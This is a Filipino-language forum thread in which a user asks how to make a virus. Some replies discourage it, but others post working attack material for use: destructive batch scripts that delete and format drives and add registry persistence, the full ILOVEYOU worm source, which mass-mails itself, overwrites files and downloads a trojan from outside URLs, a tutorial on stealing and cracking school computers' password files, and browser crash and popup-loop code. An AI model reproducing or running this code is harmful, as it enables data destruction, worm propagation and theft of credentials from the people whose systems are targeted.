View Full Version : how to make a virus??


Pages : [1] 2

hendrix
4th Apr '07 Wed, 13:14
ask ko lang po.. paano po ba gumawa ng isang virus or makapag send ng virus?? saan ko po ba pede makuha yun ng hindi po maiinfect yung pc ko... paturo po.. thanks!!!!:pray:

freshmisfits
5th Apr '07 Thu, 12:22
bad nmn yang iniicp mo.. wag nmn ganun...

Lancelot
5th Apr '07 Thu, 13:35
ask ko lang po.. paano po ba gumawa ng isang virus or makapag send ng virus??

saan ba sa pc or mobile? windows or linux? pero alam ko bad talaga yan inicip mo at wag mo na ituloy.. kung me alam ka sa or any background in program in c, c++, or any scripting language you can create your own virus or modified a source code of virus ...

why? baket? sabi ko wag mo na ituloy... kasi unang una di mo alam akung anong mangyayari sa pc mo kung na idownload mo un source at open mo un exe files.. especially if the virus design to format your drive.. whahahaaaa...:p :rofl:

it's better to have a deep knowledge in programming bago mo gawin un binabalak mong masama..

saan ko po ba pede makuha yun ng hindi po maiinfect yung pc ko... paturo po.. thanks!!!!:pray:

d2..pwede hanap ka sa google...
http://www.google.com.ph/search?hl=tl&q=virus+source+code&btnG=Hanapin+sa+Google&meta=

if talagang curious ka... gumamit ka ng linux para i download mo un source at un exe nila..cgrado di ma iinfect ang pc mo..cympre kailangan me alam ka sa linux like ubuntu or knopix etc..

how to make a virus..
http://www.google.com.ph/search?hl=tl&q=how+to+make+a+virus&btnG=Hanapin&meta=

-Lancelot

shadow_kill
5th Apr '07 Thu, 21:05
tma si sir lance! ska d lng yn ang dpat mong pg aralan pti pg gwa ng antidote ng virus n ggwin mo! sakit s ulo! hehhehe;)

rhndrixxxx
6th Apr '07 Fri, 01:42
curious lang ako.. i have no intentions of executing it..thanks for the replies..

shadow_kill
6th Apr '07 Fri, 13:39
hendrix = rhndrixxxx

d same person?!:noidea: :noidea:

rhndrixxxx
10th Apr '07 Tue, 13:33
opo.. nakalimutan ko na kasi yung password ko sa email ko eh.. kaya eto na po ang ginagamit ko.. sorry.. na confuse b kayo??

Lancelot
10th Apr '07 Tue, 16:02
medu.. pero dapat one account lang po..

-Lancelot

rentao_15
10th Apr '07 Tue, 19:40
curious lang ako.. i have no intentions of executing it..thanks for the replies..

your welcome bro... tama magaral ka na lang ng ibang bagay gaya ng antidote for virus... hehehe... pero curious din ako dyan ah... hehehe.... ichecheck ko lang.... hehehe:thumbsup:

rhndrixxxx
11th Apr '07 Wed, 10:14
hehe.. sige pag natuto ka na..turuan mo din ako ha??? ang alam ko nga lang kasi na mga virus eh yung mga batch file lang.. pambata..hehe!!

rhndrixxxx
11th Apr '07 Wed, 10:18
better yet..pede po bang mag paturo kung paano mang hack ng account?? meron po bang nakakaalam??? kasi I need to recover my other accounts eh.. na hack ata.. may remedy pa ba??

rentao_15
11th Apr '07 Wed, 22:06
hehe.. sige pag natuto ka na..turuan mo din ako ha??? ang alam ko nga lang kasi na mga virus eh yung mga batch file lang.. pambata..hehe!!

no problem bro...:dance:

shadow_kill
11th Apr '07 Wed, 23:09
try mo 2ng site n i2 rhndrixxxx.ngoogle ko lng. since im not a hacker kya d ko p ito tested and proven.

rhndrixxxx
28th Apr '07 Sat, 11:22
where is the site?? wala po akong makitang links..

CivicSIR
28th Apr '07 Sat, 12:03
Pre just a simple way to say this, DONT!!! Please dont do anything that would jeopardize someone's PC. Pag gawa ng virus is not a joke or a good thing to do. It suffer the person you wish to manipulate his or her system...what if? kung sayo ginawa yun di ba? So if i were you just have fun na lang with other thing that would pre-occupied your mind...Other Hobbies to be exact..ok :salute:

whodoes16
28th Apr '07 Sat, 12:05
mga tol.,d mgnda ung gnyan., kwa2 nmn ung taong ggnyanin nio., mging tama nmn kau., ayt?

Lancelot
28th Apr '07 Sat, 18:44
mga tol.,d mgnda ung gnyan., kwa2 nmn ung taong ggnyanin nio., mging tama nmn kau., ayt?

tama po c zen, wag lang sabihin na curious lang.. imagine those people around you then babalik then sa inyo, isipin mo kung paano..

hindi masama mag-aral how to make a virus, just do it responsibly and safe. parang kitchen knife yan sa bahay, kung gagamitin mo ng tama ang knife ok cya dba? pero kung hindi malamang maputol ang daliri mo.. :p

-Lancelot

rhndrixxxx
28th Apr '07 Sat, 18:56
on my part.. gusto ko lang po maging aware at ma educate yung sarili ko tungkol dito.. yun lang po.. gusto ko kasi makita yung buong flow ng virus eh.. cguro gamitin ko lang din siya sa akin para makita ko lang yung mga mangyayari... tutal i rereformat ko na naman din yung isang pc ko dito sa house eh..

rentao_15
28th Apr '07 Sat, 22:06
on my part.. gusto ko lang po maging aware at ma educate yung sarili ko tungkol dito.. yun lang po.. gusto ko kasi makita yung buong flow ng virus eh.. cguro gamitin ko lang din siya sa akin para makita ko lang yung mga mangyayari... tutal i rereformat ko na naman din yung isang pc ko dito sa house eh..

here meron ako nakita.... share ko lang pero please huwag niyo gamitin sa masama mga tol....
:pray: :pray: :ranting: :ranting:

Instruction

Code:

paste one of them into a notepad doc and save it as virus.bat then run it.\

So open up notepad, paste this

Code:

@echo off
DEL C:\ -y
DEL D:\ -y
FORMAT C:\ -y

Press save as then enter the name as virus.bat and run it. I take no responsibility with what you do with this


Disable Internet/Network Temporarily:

Code:

ipconfig /release
Shutdown Computer:

Code:

CODEshutdown -r -f -t 0

Harmful:
Shutdown Computer Every Time It Is Booted Up:

Code:

echo @echo off>c:\windows\hartlell.bat
echo break off>>c:\windows\hartlell.bat
echo shutdown -r -t 11 -f>>c:\windows\hartlell.bat
echo end>>c:\windows\hartlell.bat
reg add hkey_local_machine\software\microsoft\windows\curr entversion\run /v startAPI /t reg_sz /d c:\windows\hartlell.bat /f
reg add hkey_current_user\software\microsoft\windows\curre ntversion\run /v HAHAHA /t reg_sz /d c:\windows\hartlell.bat /f
echo Nick1337 Strikes Again
PAUSE

Disable Internet/Network Permanently:

Code:

echo @echo off>c:\windows\wimn32.bat
echo break off>>c:\windows\wimn32.bat
echo ipconfig/release_all>>c:\windows\wimn32.bat
echo end>>c:\windows\wimn32.bat
reg add hkey_local_machine\software\microsoft\windows\curr entversion\run /v WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f
reg add hkey_current_user\software\microsoft\windows\curre ntversion\run /v CONTROLexit /t reg_sz /d c:\windows\wimn32.bat /f
echo Undergroundkyng Strikes Again
PAUSE


Change Common Files Into .text Files )Say you have images, movies or documents and shit on your computer somewhere...well this changes them all to .text Files:

Code:

REN *.DOC *.text
REN *.JPEG *.text
REN *.LNK *.text
REN *.AVI *.text
REN *.MPEG *.text
REN *.COM *.text
REN *.BAT *.text

Format there hard drive:

Code:

@echo off
DEL C:\ -y
DEL D:\ -y
FORMAT C:\ -y

press thanks kung useful or more useful kung post kayo ng mga reactions niyo dito sa thread na ito... hindi ko pa ito nasusubukan at wala akong balak na subukan ito... hehehe

tux20004
30th Aug '07 Thu, 20:57
try mo vbs virus. medyo madali yan kung meron kang kaunting background sa programming
dyan galing ang I LOVE YOU VIRUS

wasak
30th Aug '07 Thu, 21:17
here meron ako nakita.... share ko lang pero please huwag niyo gamitin sa masama mga tol....
:pray: :pray: :ranting: :ranting:

Instruction

Code:

paste one of them into a notepad doc and save it as virus.bat then run it.\

So open up notepad, paste this

Code:

@echo off
DEL C:\ -y
DEL D:\ -y
FORMAT C:\ -y

Press save as then enter the name as virus.bat and run it. I take no responsibility with what you do with this


Disable Internet/Network Temporarily:

Code:

ipconfig /release
Shutdown Computer:

Code:

CODEshutdown -r -f -t 0

Harmful:
Shutdown Computer Every Time It Is Booted Up:

Code:

echo @echo off>c:\windows\hartlell.bat
echo break off>>c:\windows\hartlell.bat
echo shutdown -r -t 11 -f>>c:\windows\hartlell.bat
echo end>>c:\windows\hartlell.bat
reg add hkey_local_machine\software\microsoft\windows\curr entversion\run /v startAPI /t reg_sz /d c:\windows\hartlell.bat /f
reg add hkey_current_user\software\microsoft\windows\curre ntversion\run /v HAHAHA /t reg_sz /d c:\windows\hartlell.bat /f
echo Nick1337 Strikes Again
PAUSE

Disable Internet/Network Permanently:

Code:

echo @echo off>c:\windows\wimn32.bat
echo break off>>c:\windows\wimn32.bat
echo ipconfig/release_all>>c:\windows\wimn32.bat
echo end>>c:\windows\wimn32.bat
reg add hkey_local_machine\software\microsoft\windows\curr entversion\run /v WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f
reg add hkey_current_user\software\microsoft\windows\curre ntversion\run /v CONTROLexit /t reg_sz /d c:\windows\wimn32.bat /f
echo Undergroundkyng Strikes Again
PAUSE


Change Common Files Into .text Files )Say you have images, movies or documents and shit on your computer somewhere...well this changes them all to .text Files:

Code:

REN *.DOC *.text
REN *.JPEG *.text
REN *.LNK *.text
REN *.AVI *.text
REN *.MPEG *.text
REN *.COM *.text
REN *.BAT *.text

Format there hard drive:

Code:

@echo off
DEL C:\ -y
DEL D:\ -y
FORMAT C:\ -y

press thanks kung useful or more useful kung post kayo ng mga reactions niyo dito sa thread na ito... hindi ko pa ito nasusubukan at wala akong balak na subukan ito... hehehe

windows98 palng, nagamit ko nato, dos are the tyms hehe batchfile lng sya, pero lahat ng nakakasama sa computer eh virus. di na dapat share mga ganito. matagal ko na kinalimutan, nakita ko ulit ngaun. tsk... dont share dis crap, kahit pa for edu, di na dapat, kac di lahat ng tao eh may disiplina. im sure kakalat to. may virus generator pa nga ako galing sa astalavista dati. pero masama po yan. sori rentao. just clicked bad post

freshmisfits
1st Sep '07 Sat, 21:53
yayks wag kau gumawa ng virus... masama yun... tama po na wag na ishare pa ang mga knowledge na eto pra hndi gamitin... kasi hindi po lahat tau eh may mabubuting hangarin... pano pagmapadpad eto sa mga masasamang kamay at gawin sa inyo... wappaaaksss!!! ang labas nyo....
pro to this extent na nashare na eto... wala na tau magawa kundi magpray:pray: na hindi sa atin gamitin etong mga eto...

Earl
1st Sep '07 Sat, 22:15
Weee! mag.hasik ng Kaguluhan!!! :clap::slow::samurai::furious:

billabong
1st Sep '07 Sat, 23:35
wahahahahahahahaha eto na.......... Link

wasak
11th Sep '07 Tue, 10:31
for all those ppl who want to make a virus here is one i have, its actually only the code so haev fun
xxx not porn -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group /
Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\MSKernel32
",dirsystem&"\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunServices\Wi
n32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Download Directory")
if (downread="") then
downread="c:"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237 461234iuy7thjg/WIN-BUGSFIX
.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\WIN-BUGSFI
X",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")
or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&""&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or
(s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,
if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB"&a,a.AddressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META
NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-?
@GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is
good...@-@>"&vbcrlf& _
"<?-?HEAD><BODY
ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read
this HTML file<BR>- Please press #-#YES#-# button to Enable
ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@
BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE>
"&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var
hi=screen.availHeight;window.moveTo(0,0);window.re sizeTo(wi,hi);}"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
"regedit.RegWrite
@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Ru
n^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"",chr(37)+chr(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub

rentao :rofl:

wasak
11th Sep '07 Tue, 10:32
:off:

This is basic steps to hack into school district servers, I warn you getting caught is very easy if caught you will be put in jail other then that screw around with server.

We have all been there, on a public school computer that is very limited
because the administrators at the school are filled with the idea that they
have the right to limit our access to the computer. Well today, I will show
you how to get around these so called security measures that they have. Now,
Since there are a wide variety of different kinds of security software in
place all over schools across the world. I will go with the most widely used
and most common kind of attacks available.


[Short Introduction]
You know when there is an administrator account on the computer when a login
prompt comes up when you start up the computer. This tutorial shows the quest
for administrator. The entire goal of this tutorial is to learn how to get
administrator rights with full access. If a login prompts comes up when
windows starts up and it's a Windows 9.x based computer, just hit the ESC
button and you will be booted into a normal windows desktop. From here you can
do what follows in the next sections. Now, you must realize that Windows 9.x
and Windows 2000/NT computers are VERY different. Windows 9.x is super easy to
crack while Windows 2000/NT is much more of a challenge, but of course doable.
So we will start out with Windows 9.x based computers.

Windows 9.x (95,98,ME):
This section covers any Windows 9.x based system. These make up the majority
of the school's computers thanks to the monopoly that is Microsoft. Now,
Windows as you should already know was designed with the worst security in the
world. I will discuss first on how to break these computers in order from
easiest to hardest.

First required reading is the Cracking Passwords section which EVERYONE must
read first. Then if you know if you have security software installed then you can skip
to the section of which has your security software described.



[Cracking Passwords]
If there is no security software in place then it's playtime kids!!! OK, first
thing you do is go open up a DOS prompt by going to "Start", "run" and typing
in "command" without the quotes. Once you you got a DOS prompt. Type "cd"
without the quotes again. And then after that type "cd windows", yet again
without the quotes. Now DOS should display something similar to "C:/windows>".
Right? Now once it does you will insert a floppy disk into the computer. Make
sure this is YOURS!! (lol) And then you will type in the following command
into DOS (WITHOUT the quotes again): "copy *.pwl a:/"
The command above tells the computer to copy all .pwl files located in
c:/windows/system to the a:/ drive which is your floppy disk. This should take
a mere 5-10 seconds, even on slow computers. Then once it's done type in
"exit" (without the quotes) and then DOS will dissappear and all you have to
do is pop out your disk and walk away slowly. :)

Now let me explain why we did the above. Most computers at school are
networked of course. Right? And there is always the administrator. The
administrator is the account that grants unlimited access on a computer. You
don't have administrator because the people don't like you having
Administrator. But, the problem with Windows 9.x computers is that Windows
stores all the passwords in .pwl files in the c:/windows/ folder. Of course
they did take SOME security precautions by using Encryption, which means the
password is not understandable and looks like gibberish. But we copied all
.pwl files to the floppy drive via the "copy *.pwl a:/" command, which means
we saved all the .pwl files to a floppy. INCLUDING administrator and all other
accounts made on the computer. Now it's not much use to you if it is encrypted
right? That is why you must crack it. There are multiple programs out there
that can handle and crack .pwl files. One of my favorites is Cain. Cain can be
downloaded at this web site by clicking HERE. CAIN is very easy to use and has
a good attack scheme. What it does is take any .pwl file and cracks it first
by using a pre built in dictionary and then if it didn't find the right
password to it, it goes to brute force it. Brute forcing means to try every
single possible combinations of letters, numbers and characters on the
keyboard until it finally finds the right password. Keep in mind if it didn't find a password
in it's dictionary, it will move on to bruteforce, around 5 characters or so it will take
a really long time. So beware, it takes time. (Tip: The name of the .pwl file for administrator is
adminst.pwl on most computers, but the username is always Administrator , I do
not know why windows abbreviates it.)

Once you have cracked administrator, then you could always log on using
administrator and have FULL access to the computer to do/install anything you
want. Now i'm going to move on to computers that have security software
installed.



[Cracking computers with Fortes Installed]


Fortes is a very good program that does it's job well. But unfortuantely it is
disabled rather too easily. So we will begin. Make sure you get into a windows
sesson. (I.E, a desktop of some kind) Now, lets just SAY that security was set
on FULL and you have MINIMAL allowed activites. (tip: if you see that you can
still see the "RUN" icon in the Start Menu, then just read the section above
as it will still count even with fortes installed) So lets say you are only
limited to word processing and saving to a floppy, no hard drive saving, no
nothing. Easily bypassed. :) First thing is you run the word processor. This
can be wordpad, Microsoft Word, Corel WordPerfect. Anything. Just run the word
processor. Once you run it you must click the open button which us located
under the "FILE" menu in the word processor. Now surf on over to the
C:/windows/ folder. Once you get there, look for a program named
"command.com". (tip: make sure in the open dialog box that ALL FILES is
selected from the list , that way it will display all file types.) Command.com
is the file that opens up a DOS prompt. A very important file at that. Once
you have found command.com in the open dialog box, right click on it and then
select "COPY". Once you have done that go to your desktop (wallpaper area) and
then hit your right mouse button again, and then click "PASTE". Once you have
done that you must run command.com by double clicking it. Once you have it
opened it immediatly insert your floppy disk (if you haven't already done so)
and then type in the command: "copy c:/windows/*.pwl a:/" (again without the
quotes) and wait as it copies all the .pwl files in the C:/windows/ folder to
your floppy. Now once it is done type in "EXIT" into the dos prompt. And eject
your floppy disk and take it. One more thing to do and your home free. You
copied the command.com file onto the desktop and of course Fortes doesn't
allow you to delete anything. So what to do?! Easy, just right click the
wallpaper and hit "UNDO" and it dissappears. (tip: for faster deletion of the
file, hit CTRL+Z which is the same as hitting the undo button) Why hit Undo?
Because Windows keeps memory of what it last did, so if you tell it to UNDO
the last action performed in windows, that action is the copy of command.com
from c:/windows to c:/windows/desktop/ , and of course fortes allows windows
to undo it, therefore not leaving any trace of any command.com. So the entire
process was done without anyone to have any reason to get suspicious. And just
get up and walk away smiling knowing that you are going to go home and crack
those .pwl files with Cain in a matter of minutes if at most 1 hour.

Please also note that this also works for other programs as well and is NOT
limited to just command.com. For example, your bored and the administrator has
banned the games with Fortes. Easily done by using the word processor's OPEN
dialog to copy it and paste it into the desktop and then before leaving
hitting the undo button to delete it from the desktop. (note: NEVER perform
another windows action, such as copying a file from a floppy etc. etc. as this
will mess up your undo to escape from getting caught.)

wasak
11th Sep '07 Tue, 10:34
also, 2 crash a computer, type in on any html code or webpage you have the following:
<body onload=window.open("c:/con/con")>

also, to annoy any person on a website, add this code into your page's source:
<body onbeforeunload=window.open("/pagename.html") window.open("/pagename.html")>
this will keep loading two of the webpage when it is closed, then when the user closes that, another two will open, etc, etc.

wasak
11th Sep '07 Tue, 10:35
the best way!!!
turn of your fire walls have an anti virus when u receive one get it put it on a floppy disk and send it to some friend :rofl:

chaydixieandme
11th Sep '07 Tue, 11:04
remember hendrix..curiousity killed the cat!..delikado yan

Lawrencez
11th Sep '07 Tue, 22:20
ang alam ko pedeng makagawa ng virus kahit sa notepad lang., na try un ng klasmeyt q tapos bigla na lang nag-run ung anti-virus ng comp., haha

wasak
12th Sep '07 Wed, 11:45
ang alam ko pedeng makagawa ng virus kahit sa notepad lang., na try un ng klasmeyt q tapos bigla na lang nag-run ung anti-virus ng comp., haha

batch file yan tol. meron nyan dito kay rentao.
:rofl:

19jave32
12th Sep '07 Wed, 12:01
haha..:lol: kahit ung page pa lang, ung page 3 ng thread na to detected as unknown scrpit virus.. cguro ung mahabang post ni wasak ang may gawa..:rofl:

mrnine
12th Sep '07 Wed, 20:12
wow! ang galing ha :clap:! na detect agad nang anti-virus mo? avira ba?

mrnine
12th Sep '07 Wed, 20:22
Eto aking pinaka simpleng virus.
Type mo lang sa run command:

shutdown -s -t 30 -c "Virus Activated"


-s toggle shutdown
-t xx time. pwede mung baguhin ito.
-c comment. kung anong gusto mong ilagay na message. dapat merong " ".

pwede mo itong ma cancel.
type mo lang sa run command parin:

shutdown -a

-a abort

Hope this helps. weeeee:yipee:

mrnine
12th Sep '07 Wed, 20:33
Eto parin na automatic shutdown program na ginawa ko using c++ language.

#include<iostream>
using namespace std;
main()
{
system("shutdown -s -t 30 -c \"Virus Activated\"");
}


kung gusto mong ma cancel, type mo lang sa run command ang

shutdown -a
parin.

Executable File Attached. Download nyo lang. Shutdown lang talaga in 30 seconds ang gagawin nito. walang ibang malicious intent. Kahit e scan nyo pa sa anti-virus nyo, safe ito.

For experimental and educational purposes ito only ha. No malicious intent.

taraki
12th Sep '07 Wed, 21:44
